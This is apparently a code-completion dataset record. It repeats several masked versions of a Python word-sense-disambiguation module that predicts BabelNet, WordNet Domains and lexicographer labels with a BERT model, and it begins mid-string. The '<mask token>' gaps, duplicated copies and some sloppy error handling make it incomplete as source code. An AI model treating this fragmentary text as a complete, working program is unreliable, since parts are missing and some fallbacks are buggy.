modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param 
output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n 
test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. 
No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\n<mask token>\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: 
str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: 
str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually 
predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param 
output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n 
test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. 
No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef 
create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: 
str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: 
str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually 
predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param 
output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n 
test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. 
No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return 